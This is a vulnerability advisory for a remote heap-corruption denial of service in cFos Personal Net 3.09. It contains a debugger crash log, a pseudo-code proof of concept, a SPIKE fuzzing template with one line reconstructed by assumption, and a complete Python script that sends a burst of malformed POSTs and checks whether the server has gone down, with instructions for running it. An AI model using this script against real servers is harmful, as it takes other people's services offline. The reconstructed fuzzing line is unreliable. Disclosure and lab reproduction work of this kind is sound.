cFos Personal Net 3.09 Heap Corruption Denial Of Service
Source: zeroscience.mk   Author: LiquidWorm   Published: 2014-04-25
cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service


Vendor: cFos Software GmbH
Product web page: https://www.cfos.de
Affected version: 3.09

Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
personal and professional use. For personal use, instead of hosting websites
with a web hoster, you just run it on your Windows machine. For professional
use, you rent a virtual Windows PC or a dedicated PC from a web hoster and run
it there.

Desc: The cFos Personal Net web server is vulnerable to a remote denial of
service when it receives several malformed POST requests over a single socket
connection within less than 3000 ms. The server mishandles the bodies of those
requests, corrupting heap memory and crashing the HTTP service (cfospnet.exe).
In the crash log below the faulting instruction is an indirect call through a
pointer loaded from a buffer filled with 0xFEEEFEEE, the fill pattern the
Windows debug heap writes into freed blocks (0xBAADF00D, visible at esi, marks
freshly allocated uninitialised memory), so the fault is a dereference of
already-freed heap data. These fill patterns are only present when the process
runs under a debugger; outside a debugger the same fault may surface
differently or only intermittently.

SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0

============================================================================

(658.1448): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
cfospnet+0x54529:
00914529 ff5004          call    dword ptr [eax+4]    ds:002b:feeefef2=????????
0:024> d ecx
02813dcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ddc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dfc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e3c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813e4c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e5c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e6c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e7c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e8c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e9c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813eac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ebc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813ecc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813edc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813eec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813efc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813f3c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
0:024> d
02813f4c  8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04  .....q-......q-.
02813f5c  01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48  ...._CFPNET_PATH
02813f6c  00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04  .............A,.
02813f7c  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00  ............)...
02813f8c  2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  /...............
02813f9c  00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04  .....f.8.....1,.
02813fac  d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fbc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d
02813fcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fdc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813fec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ffc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281400c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281401c  ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f  .............f./
0281402c  c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00  ........n.a.m.e.
0281403c  3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  =...............
0:024> d
0281404c  00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02  .....f."....`...
0281405c  10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe  ..+.............
0281406c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281407c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281408c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281409c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
028140ac  dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02  ........07...K..
028140bc  00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00  ....REQUEST_URI.
0:024> d
028140cc  0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02  .............A..
028140dc  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00  ................
028140ec  1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  ................
028140fc  00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72  .....f.-..../scr
0281410c  69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f  ipts/get_server_
0281411c  73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab  stats.jss.......
0281412c  ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f  .............f.?
0281413c  d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe  .....J,...-.....
0:024> d
0281414c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281415c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281416c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281417c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281418c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0281419c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
028141ac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
028141bc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d esi
028198b0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198c0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198d0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198e0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198f0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819900  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819910  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819920  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................

============================================================================


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5184
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php


01.04.2014

---


-ALGjlang

 open_socket(); for(j=1;j<=30;j++)
 {
 send_socket("
 POST /scripts/get_server_stats.jss?name= HTTP/1.1
 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 Accept: */*
 Host: 192.168.0.107
 Content-Length: 20

 AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
 ") } close_socket();


-SPKfzz

 s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
 s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
 s_string("Accept: */*\r\n");          // the CRLF was missing here, which merged Accept and Host into one header line
 s_string("Host: 192.168.0.107\r\n");
 s_string("Content-Length: ");
 s_blocksize_string("fuzz",15);        // Content-Length is filled in from the size of the "fuzz" block as a 15-character decimal string
 s_string("\r\n\r\n");

 s_block_start("fuzz");
 s_string_repeat("joxypoxyjoxypoxy!!\r\n", 100);  // filler sent 100 times; the original line was garbled ("...\r\n\" * 100), SPIKE's s_string_repeat is assumed here
 s_string_variable("ZSL");             // fuzz point: SPIKE substitutes entries from its string library here on each iteration
 s_string("\r\n"); // important
 s_block_end("fuzz");
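The pseudo-PoC and the SPIKE template above both boil down to the same thing: one TCP connection, a burst of POSTs whose declared Content-Length disagrees with the bytes actually sent, delivered inside the 3000 ms window. The following Python script is an added example, not the advisory's or the vendor's code; it reproduces that burst, lets you confirm the declared/actual length mismatch before sending, and checks whether the HTTP service still answers afterwards. The target address and port are assumptions (the advisory's own PoC used 192.168.0.107); the body is laid out as printed in the pseudo-PoC (18 bytes of 'A' plus CRLFCRLF, declared as 20).

```python
"""
Added example (not the advisory's own code): reproduce the malformed-POST
burst over a single socket and check whether the service survived.
Target host/port are assumptions for a lab setup.
"""
import socket
import sys
import time

# Body as printed in the advisory's pseudo-PoC: 18 'A's followed by CRLFCRLF
# (22 bytes on the wire) while the header declares Content-Length: 20. The
# disagreement between declared and actual length is what makes the POST
# "malformed".
BODY = b"A" * 18 + b"\r\n\r\n"
DECLARED_LENGTH = 20
REQUEST_PATH = "/scripts/get_server_stats.jss?name="


def build_request(host, body=BODY, content_length=DECLARED_LENGTH):
    """Return the raw POST bytes with the same header layout as the PoC."""
    headers = (
        f"POST {REQUEST_PATH} HTTP/1.1\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n"
        "Accept: */*\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {content_length}\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body


def length_mismatch(request):
    """Return (declared Content-Length, actual body length) for a raw request,
    so the malformation can be verified before anything is sent."""
    head, _, body = request.partition(b"\r\n\r\n")
    declared = None
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            declared = int(value.strip())
    return declared, len(body)


def send_burst(host, port=80, count=30, window_ms=3000):
    """Send `count` malformed POSTs over ONE connection as fast as possible.
    Returns (requests written, elapsed ms, whether the burst fit in the
    window). Per the advisory the crash needs the burst inside ~3000 ms, so a
    False third element means the condition was not actually reproduced."""
    req = build_request(host)
    start = time.monotonic()
    sent = 0
    with socket.create_connection((host, port), timeout=5) as s:
        for _ in range(count):
            try:
                s.sendall(req)
                sent += 1
            except OSError:
                break  # peer closed the socket, possibly already crashed
    elapsed_ms = (time.monotonic() - start) * 1000
    return sent, elapsed_ms, elapsed_ms <= window_ms


def is_alive(host, port=80, timeout=3):
    """Liveness check: a plain GET / should yield an HTTP status line."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(f"GET / HTTP/1.1\r\nHost: {host}\r\n\r\n".encode("ascii"))
            return s.recv(64).startswith(b"HTTP/")
    except OSError:
        return False


if __name__ == "__main__":
    # Assumed lab target; pass host and port on the command line to override.
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.107"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print("declared/actual body length:", length_mismatch(build_request(target)))
    print("alive before burst:", is_alive(target, port))
    sent, ms, in_window = send_burst(target, port)
    print(f"sent {sent} requests in {ms:.0f} ms (inside 3000 ms window: {in_window})")
    time.sleep(2)
    print("alive after burst:", is_alive(target, port))
```

Run it with the target host (and port, if not 80) as arguments. A False value from `is_alive` after the burst, combined with True before it, is the observable DoS; a burst that does not fit in the window is not a negative result for the bug, only a failed reproduction.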

 